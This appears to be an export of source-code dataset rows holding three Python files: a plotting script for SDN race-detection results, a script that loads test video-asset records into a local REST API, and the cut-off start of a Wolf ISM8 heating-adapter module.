'10': 10,
'inf': 11, # hack for plots
}
sorted_timing_values = sorted(timing_values.items(), key=lambda x: x[1])
# http://matplotlib.org/api/markers_api.html
markers = ['x',
'+',
'.',
'o',
'*',
# ',',
'1',
'2',
'3',
'4',
'8',
'<',
'>',
'D',
'H',
'^',
'_',
'd',
'h',
'p',
's',
'v',
'|',
0,
1,
2,
3,
4,
5,
6,
7,]
def get_correct_alt_barr_prefix(name):
"""
Whether to use alt-barr results or not. Should be True for purely reactive controllers, and False for proactive controllers that use barriers.
"""
prefix_for_name = {}
prefix_for_name['trace_floodlight_learningswitch-StarTopology2-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-StarTopology4-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-StarTopology8-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-BinaryLeafTreeTopology1-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-BinaryLeafTreeTopology2-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology2-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology4-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology8-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-BinaryLeafTreeTopology1-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-BinaryLeafTreeTopology2-steps200'] = True
prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology1-steps200'] = False
# prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology1-steps400'] = False
prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology2-steps200'] = False
# prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology2-steps400'] = False
# consistent, barriers
prefix_for_name['trace_pox_ConsistencyTopology-False-False-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-False-True-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-True-False-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-True-True-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-BinaryLeafTreeTopology1-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-BinaryLeafTreeTopology2-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-StarTopology2-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-StarTopology4-steps200'] = True
prefix_for_name['trace_onos-ifwd-StarTopology2-steps200'] = False
prefix_for_name['trace_onos-ifwd-MeshTopology2-steps200'] = False
prefix_for_name['trace_onos-ifwd-BinaryLeafTreeTopology1-steps200'] = False
prefix_for_name['trace_onos-ifwd-BinaryLeafTreeTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-StarTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-MeshTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-BinaryLeafTreeTopology1-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-BinaryLeafTreeTopology2-steps200'] = False
if name in prefix_for_name:
if prefix_for_name[name]:
return 'True-'
else:
return 'False-'
else:
print "get_correct_alt_barr_prefix() unknown for " + name
return # nothing
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('result_dirs', nargs='+' )
parser.add_argument('--no-plots', dest='no_plots', action='store_true',
default=False, help="Do not write any plot PDFs to the disk.")
args = parser.parse_args()
main(args.result_dirs, args.no_plots)
| 37.871391 | 168 | 0.662069 | #!/usr/bin/env python
import argparse
import csv
import glob
import os
import itertools
from pylab import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from asyncore import loop
# Values we care about
keys = []
keys.append('num_read')
keys.append('num_writes')
keys.append('num_ops')
keys.append('num_rw_time_edges')
keys.append('num_ww_time_edges')
keys.append('num_time_edges')
keys.append('num_harmful')
keys.append('num_commute')
keys.append('num_races')
keys.append('num_covered')
keys.append('num_per_pkt_races')
keys.append('num_per_pkt_inconsistent')
keys.append('num_per_pkt_inconsistent_covered')
keys.append('num_per_pkt_entry_version_race')
keys.append('num_per_pkt_inconsistent_no_repeat')
keys.append('total_time_sec')
keys.append('load_time_sec')
keys.append('detect_races_time_sec')
keys.append('extract_traces_time_sec')
keys.append('find_reactive_cmds_time_sec')
keys.append('find_proactive_cmds_time_sec')
keys.append('find_covered_races_time')
keys.append('per_packet_inconsistent_time_sec')
keys.append('find_inconsistent_update_time_sec')
per_pkt_consistency = ['num_per_pkt_races', 'num_per_pkt_inconsistent',
'num_per_pkt_inconsistent_covered',
'num_per_pkt_entry_version_race']
prefixes = ['True-','False-']
timing_values = {'0': 0,
'1': 1,
'2': 2,
'3': 3,
'4': 4,
'5': 5,
'6': 6,
'7': 7,
'8': 8,
'9': 9,
'10': 10,
'inf': 11, # hack for plots
}
sorted_timing_values = sorted(timing_values.items(), key=lambda x: x[1])
# http://matplotlib.org/api/markers_api.html
markers = ['x',
'+',
'.',
'o',
'*',
# ',',
'1',
'2',
'3',
'4',
'8',
'<',
'>',
'D',
'H',
'^',
'_',
'd',
'h',
'p',
's',
'v',
'|',
0,
1,
2,
3,
4,
5,
6,
7,]
def main(result_dirs, no_plots=False):
tables = {}
base_names = []
lookup_tables = {}
row_mapping = {}
col_mapping = {}
for p in prefixes:
tables[p] = {}
for name in result_dirs:
fname = name
if not fname.endswith('.csv'):
fname = os.path.join(name, 'summary.csv')
with open(fname) as csvfile:
table = {}
keys = []
base_name = os.path.basename(os.path.normpath(name))
assert base_name not in base_names
base_names.append(base_name)
csviter = csv.reader(csvfile, delimiter=',')
csvdata = []
for row in csviter:
csvdata.append(row)
lookup_tables[base_name] = {}
row_mapping[base_name] = {}
for ridx,row in enumerate(csvdata):
# first row has to contain header
# generate a lookup table
key = row[0]
if ridx == 0:
assert key == 'key/t'
row_mapping[base_name][ridx] = key
col_mapping[base_name] = {}
for cidx, col_name in enumerate(row):
col_mapping[base_name][cidx] = col_name
lookup_tables[base_name][col_name] = {}
else:
assert base_name in col_mapping
row_mapping[base_name][ridx] = key
for cidx, field_value in enumerate(row):
col_name = col_mapping[base_name][cidx]
lookup_tables[base_name][col_name][key] = field_value
for p in prefixes:
table[p] = {}
col_names_with_prefix = {}
for col_name in lookup_tables[base_name]:
if col_name != 'key/t' and str(col_name).startswith(p):
timing_str = str(col_name).partition(p)[2]
assert timing_str in timing_values
timing_as_integer = timing_values[timing_str]
col_names_with_prefix[col_name] = timing_as_integer
# sort by timing so that pyplot can understand it, tuples of (key, value)
sorted_col_names_with_prefix = sorted(col_names_with_prefix.items(), key=lambda x: x[1])
for ridx,key in row_mapping[base_name].iteritems():
row_values = []
if ridx == 0:
for col_name, timing in sorted_col_names_with_prefix:
row_values.append(timing)
table[p][key] = row_values
else:
for col_name, timing in sorted_col_names_with_prefix:
field_value = lookup_tables[base_name][col_name][key]
row_values.append(field_value)
table[p][key] = row_values
tables[p][base_name] = table[p]
keys_to_plot = ['num_harmful', 'num_commute', 'num_races', 'num_rw_time_edges', 'num_ww_time_edges',
'num_per_pkt_races', 'num_per_pkt_inconsistent', 'num_per_pkt_inconsistent_covered', 'num_per_pkt_entry_version_race', 'num_per_pkt_inconsistent_no_repeat']
if not no_plots:
# Plot summaries for all values
for p in prefixes:
for key in keys_to_plot:
plot_with_delta(tables[p], p, key, False)
for name in tables[p]:
plot_with_delta_multiple(tables[p], p, name,
out_name=get_short_name(name) + "_pkt_consist",
keys=per_pkt_consistency,
use_log=False)
plot_with_delta_multiple(tables[p], p, name,
out_name=get_short_name(name) + "_overview_covered_races",
keys=['num_harmful',
'num_covered'],
use_log=True)
plot_with_delta_multiple(tables[p], p, name,
out_name=get_short_name(name) + "_overview_covered_traces",
keys=['num_per_pkt_inconsistent',
'num_per_pkt_inconsistent_covered',
'num_per_pkt_entry_version_race',
'num_per_pkt_inconsistent_no_repeat'],
use_log=True)
def get_correct_alt_barr_prefix(name):
"""
Whether to use alt-barr results or not. Should be True for purely reactive controllers, and False for proactive controllers that use barriers.
"""
prefix_for_name = {}
prefix_for_name['trace_floodlight_learningswitch-StarTopology2-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-StarTopology4-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-StarTopology8-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-BinaryLeafTreeTopology1-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-BinaryLeafTreeTopology2-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology2-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology4-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology8-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-BinaryLeafTreeTopology1-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-BinaryLeafTreeTopology2-steps200'] = True
prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology1-steps200'] = False
# prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology1-steps400'] = False
prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology2-steps200'] = False
# prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology2-steps400'] = False
# consistent, barriers
prefix_for_name['trace_pox_ConsistencyTopology-False-False-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-False-True-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-True-False-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-True-True-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-BinaryLeafTreeTopology1-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-BinaryLeafTreeTopology2-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-StarTopology2-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-StarTopology4-steps200'] = True
prefix_for_name['trace_onos-ifwd-StarTopology2-steps200'] = False
prefix_for_name['trace_onos-ifwd-MeshTopology2-steps200'] = False
prefix_for_name['trace_onos-ifwd-BinaryLeafTreeTopology1-steps200'] = False
prefix_for_name['trace_onos-ifwd-BinaryLeafTreeTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-StarTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-MeshTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-BinaryLeafTreeTopology1-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-BinaryLeafTreeTopology2-steps200'] = False
if name in prefix_for_name:
if prefix_for_name[name]:
return 'True-'
else:
return 'False-'
else:
print "get_correct_alt_barr_prefix() unknown for " + name
return # nothing
def get_short_name(name):
names = {}
# names['trace_floodlight_forwarding-BinaryLeafTreeTopology1-steps100'] = 'FL_FWD-BinTree1-steps100'
# names['trace_floodlight_forwarding-BinaryLeafTreeTopology1-steps200'] = 'FL_FWD-BinTree1-steps200'
# names['trace_floodlight_forwarding-BinaryLeafTreeTopology2-steps100'] = 'FL_FWD-BinTree2-steps100'
# names['trace_floodlight_forwarding-BinaryLeafTreeTopology2-steps200'] = 'FL_FWD-BinTree2-steps200'
#
# names['trace_pox_ConsistencyTopology-False-False-steps100'] = 'pox_Inconsistent-Wait-steps100'
# names['trace_pox_ConsistencyTopology-False-False-steps200'] = 'pox_Inconsistent-Wait-steps200'
# names['trace_pox_ConsistencyTopology-False-True-steps100'] = 'pox_Inconsistent-Barriers-steps100'
# names['trace_pox_ConsistencyTopology-False-True-steps200'] = 'pox_Inconsistent-Barriers-steps200'
# names['trace_pox_ConsistencyTopology-True-False-steps100'] = 'pox_Consistent-Wait-steps100'
# names['trace_pox_ConsistencyTopology-True-False-steps200'] = 'pox_Consistent-Wait-steps200'
# names['trace_pox_ConsistencyTopology-True-True-steps100'] = 'pox_Consistent-Barriers-steps100'
# names['trace_pox_ConsistencyTopology-True-True-steps200'] = 'pox_Consistent-Barriers-steps200'
if name in names:
return names[name]
new_name = name
new_name = new_name.replace('trace_', '')
new_name = new_name.replace('floodlight', 'FL')
new_name = new_name.replace('pox', 'PX')
new_name = new_name.replace('onos', 'ON')
new_name = new_name.replace('MeshTopology', 'me')
new_name = new_name.replace('GridTopology', 'gr')
new_name = new_name.replace('BinaryLeafTreeTopology', 'bt')
new_name = new_name.replace('ConsistencyTopology', 'ct')
new_name = new_name.replace('StarTopology', 'st')
# new_name = new_name.replace('False', 'F')
# new_name = new_name.replace('True', 'T')
new_name = new_name.replace('False-False', 'IW')
new_name = new_name.replace('False-True', 'IB')
new_name = new_name.replace('True-False', 'CW')
new_name = new_name.replace('True-True', 'CB')
new_name = new_name.replace('forwarding', 'fwd')
new_name = new_name.replace('learningswitch', 'lrn')
new_name = new_name.replace('circuitpusher', 'crc')
new_name = new_name.replace('l2_multi', 'l2m')
new_name = new_name.replace('-steps100', '-100')
new_name = new_name.replace('-steps200', '-200')
return new_name
def plot_with_delta_multiple(tables, prefix, name, keys, out_name, use_log=True, formatter=int):
plt.clf()
fig = plt.figure()
fig.suptitle(name, fontsize=14, fontweight='bold')
ax = fig.add_subplot(111)
ax.grid(True)
marker = itertools.cycle(markers) # repeat forever
ax.set_xlabel('$\epsilon$')
#ax.set_ylabel(key)
table = tables[name]
for key in keys:
values = [formatter(x) for x in table[key]]
ax.plot(table['key/t'], values, label=get_short_name(key), marker=marker.next())
if use_log:
ax.set_yscale('log')
ax.yaxis.set_major_formatter(ScalarFormatter())
ax.ticklabel_format(style='plain', axis='y')
plt.legend(bbox_to_anchor=(1, 1), bbox_transform=plt.gcf().transFigure)
# Shrink current axis's height by 10% on the bottom
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.2,
box.width, box.height * 0.8])
# Put a legend below current axis
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),
fancybox=True, shadow=True, ncol=1, prop={'size':6})
fname = '%s%s.pdf' % (prefix, out_name)
print fname
pp = PdfPages(fname)
fig.savefig(pp, format='pdf')
#pp.savefig()
pp.close()
plt.close(fig)
def plot_with_delta(tables, prefix, key, use_log=True, formatter=int):
plt.clf()
fig = plt.figure()
fig.suptitle(key, fontsize=14, fontweight='bold')
ax = fig.add_subplot(111)
ax.grid(True)
marker = itertools.cycle(markers) # repeat forever
ax.set_xlabel('$\epsilon$')
ax.set_ylabel(key)
for name in tables:
values = [formatter(x) for x in tables[name][key]]
ax.plot(tables[name]['key/t'], values, label=get_short_name(name), marker=marker.next())
if use_log:
ax.set_yscale('log')
ax.yaxis.set_major_formatter(ScalarFormatter())
ax.ticklabel_format(style='plain', axis='y')
plt.legend(bbox_to_anchor=(1, 1), bbox_transform=plt.gcf().transFigure)
# Shrink current axis's height by 10% on the bottom
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.2,
box.width, box.height * 0.8])
# Put a legend below current axis
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),
fancybox=True, shadow=True, ncol=1, prop={'size':6})
fname = '%s%s.pdf' % (prefix, key)
print fname
pp = PdfPages(fname)
fig.savefig(pp, format='pdf')
#pp.savefig()
pp.close()
plt.close(fig)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('result_dirs', nargs='+' )
parser.add_argument('--no-plots', dest='no_plots', action='store_true',
default=False, help="Do not write any plot PDFs to the disk.")
args = parser.parse_args()
main(args.result_dirs, args.no_plots)
| 8,783 | 0 | 92 |
1c59c47850aa708f1f8006c09f199f92f56b6546 | 6,881 | py | Python | src/pack/bin/simple_setup.py | mbari-media-management/vampire-squid | 4e9c380daf47fbdb4215e614e65eb504bb63cda1 | [
"Apache-2.0"
] | 5 | 2019-06-26T18:18:53.000Z | 2021-12-04T18:12:43.000Z | src/pack/bin/simple_setup.py | mbari-media-management/vampire-squid | 4e9c380daf47fbdb4215e614e65eb504bb63cda1 | [
"Apache-2.0"
] | 1 | 2019-02-28T18:06:56.000Z | 2019-03-01T00:50:06.000Z | src/pack/bin/simple_setup.py | mbari-media-management/vampire-squid | 4e9c380daf47fbdb4215e614e65eb504bb63cda1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# This is a script for loading some test data into the video-asset-manager using
# REST calls. Each insert is being done as a separate call, which is the only type of
# insert that the API supports at this point.
#
# Note that for production loads, we would not do this in this manner. Instead, we might
# use a script that takes a few parameters (e.g. file URL, camera_id) then
# - auto-generates some parameters, such as video-sequence name and video name.
# - parses the other metadata from the video file as json, using something like ffprobe
# - maps the json from ffprobe to the asset managers metadata.
# - generates the video-sequence and video objects via API's calls as needed.
import requests
import json
base_url = "http://localhost:8080/v1/"
vs_url = base_url + "videosequence"
v_url = base_url + "video"
vr_url = base_url + "videoreference"
vs1 = read(vs_url,
data = {"name": "T0097",
"camera_id": "Tiburon"})
v1_1 = read(v_url,
data = {"name": "T0097-01",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"]})
vr1_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mov",
"video_uuid": v1_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mp4",
"video_uuid": v1_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
v1_2 = read(v_url,
data = {"name": "T0097-02",
"start": "2016-04-05T00:01:15Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This video is cool"})
vr1_2_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mov",
"video_uuid": v1_2["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_2_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mp4",
"video_uuid":v1_2["uuid"],
"container":"video/mp4",
"video_codec":"H.264",
"audio_codec":"AAC",
"width":1920,
"height":1080,
"frame_rate":19})
v1_3 = read(v_url,
data = {"name": "T0097-01HD",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This is a reference to a tape that overlaps with video files"})
vr1_3_1 = read(vr_url,
data = {"uri": "urn:T0097-01HD",
"video_uuid": v1_3["uuid"],
"width": 1920,
"height": 1080,
"frame_rate": 29.97,
"description": "D5 Tape"})
vs2 = read(vs_url,
data = {"name": "V1234", "camera_id": "Ventana"})
v2_1 = read(v_url,
data = {"name": "V1234-01",
"start": "2016-06-12T00:18:31Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs2["uuid"]})
vr2_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mov",
"video_uuid": v2_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr2_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mp4",
"video_uuid": v2_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 19})
vs3 = read(vs_url,
data = {"name": "V9931", "camera_id": "Ventana"})
v3_1 = read(v_url,
data = {"name": "V9931-01",
"start": "2011-12-12T00:00:10Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs3["uuid"]})
vr3_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mov",
"video_uuid": v3_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr3_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 30})
vr3_1_3 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z_midres.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 720,
"height": 640,
"frame_rate": 19})
print("--- Database Dump -----------------------------------------------------")
db_dump = json.loads(requests.get(v_url).text)
print(json.dumps(db_dump, sort_keys=True, indent=2, separators=(',', ': '))) | 43.828025 | 99 | 0.46098 | #!/usr/bin/env python
# This is a script for loading some test data into the video-asset-manager using
# REST calls. Each insert is being done as a separate call, which is the only type of
# insert that the API supports at this point.
#
# Note that for production loads, we would not do this in this manner. Instead, we might
# use a script that takes a few parameters (e.g. file URL, camera_id) then
# - auto-generates some parameters, such as video-sequence name and video name.
# - parses the other metadata from the video file as json, using something like ffprobe
# - maps the json from ffprobe to the asset managers metadata.
# - generates the video-sequence and video objects via API's calls as needed.
import requests
import json
def read(url, data = {}):
r = requests.post(url, data)
return json.loads(r.text)
base_url = "http://localhost:8080/v1/"
vs_url = base_url + "videosequence"
v_url = base_url + "video"
vr_url = base_url + "videoreference"
vs1 = read(vs_url,
data = {"name": "T0097",
"camera_id": "Tiburon"})
v1_1 = read(v_url,
data = {"name": "T0097-01",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"]})
vr1_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mov",
"video_uuid": v1_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mp4",
"video_uuid": v1_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
v1_2 = read(v_url,
data = {"name": "T0097-02",
"start": "2016-04-05T00:01:15Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This video is cool"})
vr1_2_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mov",
"video_uuid": v1_2["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_2_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mp4",
"video_uuid":v1_2["uuid"],
"container":"video/mp4",
"video_codec":"H.264",
"audio_codec":"AAC",
"width":1920,
"height":1080,
"frame_rate":19})
v1_3 = read(v_url,
data = {"name": "T0097-01HD",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This is a reference to a tape that overlaps with video files"})
vr1_3_1 = read(vr_url,
data = {"uri": "urn:T0097-01HD",
"video_uuid": v1_3["uuid"],
"width": 1920,
"height": 1080,
"frame_rate": 29.97,
"description": "D5 Tape"})
vs2 = read(vs_url,
data = {"name": "V1234", "camera_id": "Ventana"})
v2_1 = read(v_url,
data = {"name": "V1234-01",
"start": "2016-06-12T00:18:31Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs2["uuid"]})
vr2_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mov",
"video_uuid": v2_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr2_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mp4",
"video_uuid": v2_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 19})
vs3 = read(vs_url,
data = {"name": "V9931", "camera_id": "Ventana"})
v3_1 = read(v_url,
data = {"name": "V9931-01",
"start": "2011-12-12T00:00:10Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs3["uuid"]})
vr3_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mov",
"video_uuid": v3_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr3_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 30})
vr3_1_3 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z_midres.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 720,
"height": 640,
"frame_rate": 19})
print("--- Database Dump -----------------------------------------------------")
db_dump = json.loads(requests.get(v_url).text)
print(json.dumps(db_dump, sort_keys=True, indent=2, separators=(',', ': '))) | 75 | 0 | 23 |
4c405f7cef7119b297f3b6a357e3b86b8b9f4ec5 | 28,254 | py | Python | wolfism8/ism8.py | nanosonde/python-wolfism8 | 20f4ac2e40a2f711f00a833107e286f802a21364 | [
"MIT"
] | null | null | null | wolfism8/ism8.py | nanosonde/python-wolfism8 | 20f4ac2e40a2f711f00a833107e286f802a21364 | [
"MIT"
] | null | null | null | wolfism8/ism8.py | nanosonde/python-wolfism8 | 20f4ac2e40a2f711f00a833107e286f802a21364 | [
"MIT"
] | null | null | null | """
Module for gathering info from Wolf Heating System via ISM8 adapter
"""
import logging
import asyncio
class Ism8(asyncio.Protocol):
"""
This protocol class is invoked to listen to message from ISM8 module and
feed data into internal data array
"""
ISM_HEADER = b'\x06\x20\xf0\x80'
ISM_CONN_HEADER = b'\x04\x00\x00\x00'
ISM_ACK = b'\xF0\x86\x00\x00\x00\x00\x00'
ISM_POLL = b'\x06\x20\xF0\x80\x00\x16\x04\x00\x00\x00\xF0\xD0'
# constant byte arrays for creating ISM8 network messages
DP_DEVICE = 0
# index of Wolf ISM main device name
DP_NAME = 1
# index of datapoint name
DP_TYPE = 2
# index of datapoint type (as described in Wolf API)
DP_RW = 3
# index of R/W-flag (writing not implemented so far)
DP_UNIT = 4
# index of unit description, if applicable
DATAPOINTS = {
1: ('HG1', 'Stoerung', 'DPT_Switch', False, ''),
2: ('HG1', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
3: ('HG1', 'Brennerleistung', 'DPT_Scaling', False, '%'),
4: ('HG1', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
5: ('HG1', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
6: ('HG1', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
7: ('HG1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
8: ('HG1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
9: ('HG1', 'Status Brenner', 'DPT_Switch', False, ''),
10: ('HG1', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
11: ('HG1', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
12: ('HG1', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
13: ('HG1', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
14: ('HG2', 'Stoerung', 'DPT_Switch', False, ''),
15: ('HG2', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
16: ('HG2', 'Brennerleistung', 'DPT_Scaling', False, '%'),
17: ('HG2', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
18: ('HG2', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
19: ('HG2', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
20: ('HG2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
21: ('HG2', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
22: ('HG2', 'Status Brenner', 'DPT_Switch', False, ''),
23: ('HG2', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
24: ('HG2', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
25: ('HG2', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
26: ('HG2', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
27: ('HG3', 'Stoerung', 'DPT_Switch', False, ''),
28: ('HG3', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
29: ('HG3', 'Brennerleistung', 'DPT_Scaling', False, '%'),
30: ('HG3', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
31: ('HG3', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
32: ('HG3', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
33: ('HG3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
34: ('HG3', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
35: ('HG3', 'Status Brenner', 'DPT_Switch', False, ''),
36: ('HG3', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
37: ('HG3', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
38: ('HG3', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
39: ('HG3', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
